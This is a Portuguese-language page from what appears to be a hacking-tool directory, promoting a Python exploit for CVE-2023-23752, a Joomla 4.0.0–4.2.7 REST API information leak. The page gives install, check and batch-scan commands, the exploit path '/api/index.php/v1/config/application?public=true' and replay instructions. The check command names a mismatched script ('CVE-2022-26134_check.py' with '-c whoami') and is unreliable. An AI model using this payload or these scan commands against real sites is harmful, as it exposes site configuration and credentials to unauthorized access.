Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-23752 — Exploit baseado em Python para CVE-2023-23752 visando Joomla 4.0.0-4.2.7 acesso não autorizado à API REST, permitindo divulgação de informações sensíveis através de payloads elaborados. | Kitploit
Ferramentas/GitHubGitHub/ytxzx/cve-2023-23752
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubytxzx/cve-2023-23752

CVE-2023-23752

Exploit baseado em Python para CVE-2023-23752 visando Joomla 4.0.0-4.2.7 acesso não autorizado à API REST, permitindo divulgação de informações sensíveis através de payloads elaborados.

Ver Repositório
1há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-23752 - Recorrência da Vulnerabilidade de Acesso Não Autorizado do Joomla

Uso do Script

Instalar a biblioteca python

pip install -r requirements.txt

Verificação de Vulnerabilidade

python3 CVE-2022-26134_check.py -u url -c whoami

imagem

Varredura em lote

python3 CVE-2023-23752.py -f url_part.txt

imagem

Versões Afetadas

4.0.0 <= Joomla <= 4.2.7

Exploração da Vulnerabilidade

payload:

/api/index.php/v1/config/application?public=true

Acesse o endereço vulnerável, capture o pacote, repita o pacote de dados.

imagem

Princípio da Vulnerabilidade

Joomla! CMS versão 4.0.0-4.2.7, devido a restrições inadequadas de acesso aos endpoints do serviço web, pode levar a acesso não autorizado à API REST, resultando em vazamento de informações confidenciais.

Baixar ferramenta